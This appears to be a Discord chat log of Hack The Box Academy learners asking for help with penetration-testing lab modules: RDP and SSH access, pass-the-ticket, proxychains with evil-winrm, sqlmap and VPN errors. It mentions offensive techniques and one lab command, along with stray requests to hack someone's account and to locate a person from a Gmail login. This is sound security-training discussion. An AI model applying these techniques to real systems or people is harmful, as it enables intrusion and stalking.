alpine will usually have /bin/sh and /bin/ash

ASH!

The only one I didn't try LOL

Do any one know ? 😢

use the nmap scan to tell you where to look

I want to say that the nmap script used to print out the contents of the relevant file, but I have no clue why it's not doing it now

Well, the flag fittingly contains "containers uhhh".

thanks for the hint @trail leaf

1 is the highest, right?

/sarcasm

What's your question (that's probably already been asked 1000x)

are these modules in order?

on this section https://academy.hackthebox.com/module/67/section/912 (Windows Server) module: "Windows Priv Esc" there is a problem since it is server 2008 when connecting with rdp, tls error

using xfreerdp we must use /sec:rdp

erratum

Yes

Hello, quick question in password attacks - pass the ticket. It tells us to rdp into the box but the creds didn't work for me. I managed to get round it by using the hash from the pass the hash module. Was this the intended route to get rdp access?

Put password in single quotes

yo having abit of trouble with the footprinting easy lab, wget all the files for ftp on prot 2121 and found the id_rsa.pub, id_rsa and authorized keys and chmod 600 them all but when i ssh -i id_rsa celi@<box ip> and then login with the provided password i get permission denied? any suggestions

That's weird I swear i've used xfreerdp without quotes before

Because that's not the username

lol

ceil

Thsts the password with $$ in it?

Yea

Oh thats so annoying haha

im blind i swear

I forget what variable it calls

Thanks for clarifying 🙂

Single quotes tells bash to interpret it as string

Yea you're right cheers

you'd be surprised how many people have asked this question

I tried searching and found someone with the same issue but someone must have pm them the answer

I swear it's either been answered here or #cpts

its also just Linux fundemental knowledge

you should know your special characters

!!

https://academy.hackthebox.com/achievement/699153/143

just finished AD enum and attacks

few what a module

if anyone needs help dm me

Its definitely a tough module. Although its not the hardest. heh.

Im doing the network analysis traffic module and one of the files is not showing the questions after extracting the zip file

it only shows the answer sheet

Can somebody hack my old acc that was hacked and i cant have access anymore and give it back to me please i will be grateful a lot

no, wrong server entirely

idk where to ask for help so im doing it here, why dosent my firefox load anything

Why is it that cypher query to find users who can PsRemote only returns one user but I can see with PowerView that there are other users with that right?

This exercise: https://academy.hackthebox.com/module/143/section/1275

I love this lol

you should practice how can you have pudding if you dont practice?

Thats because it's optional

even is not a mandatory exercise anyone could help me with my problem with /etc/proxychain using impacket and evilwinrm

proxychains evil-winrm -i dc01 -r inlanefreight.htb
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
error: invalid item in proxylist section: cat /etc/proxychains.conf%

socks5 127.0.0.1 1080 is writted in proxylist in the file

saying invalid item, so you typod something

@trail leaf

I just read this about --force option

:)

🙂

lol a hashcat core dev

I sell diabetes and diabetes accessories😆

lol

thanks for the tool . My main tool for hash cracking.

it is legal now to send my question?

?

yesterday i see moderator didnot allow to send questions with snipsetts

and remove my messeges

Ah, just dont worry about it.

so now can i send normally?

Its being handled. And very well could be just that is in fact the new enforcement policy.

?

dude?

hello there, i have a question (wasnt sure where to send this); someone was logged into my gmail account and it shows me the general state (same one im in). would it be possible to get that persons exact address?

and didnot work

and give me this error!!!
how i can solve it

what the hell

who is remove my question

really it is alot of people send snipsets and did not remive there is messages

@everyone

Brother you can't @ everyone lol

Literally

If it's removed there's probably a reason

sorry but i do not know it is prohipted

but what is the reason?

I mean it doesn't actually ping

No idea brother

I'm not a part of Moderation or Staff

ok thanks

can i ask you in DM?

I haven't done this module

So can't really help there

ok thanks

what module you working on?

Introduction to Bash Scripting -->Flow Control - Loops

ok you can dm me think I could help with that

I have a question relating to sqlmap ... how do you discover prefixes or suffixes needed to make your injection work ... in the module they kind of give that info but how do you discover it?

Please my openvpn on hack the box don't connect it's only showing me UDPV4 link local not bound Tlc error
UDPv4 link remote [AF_INET]

Try using the tcp connection instead

Alright

Did not work

Attempting to establish TCP connection with [AF_INET]38.46.224.104:443
2023-08-01 02:53:06 TCP: connect to [AF_INET]38.46.224.104:443 failed: Connection timed out
2023-08-01 02:53:06 SIGUSR1[connection failed(soft),connection-failed] received, process restarting
this is what it keep on telling me

Try a different region

okay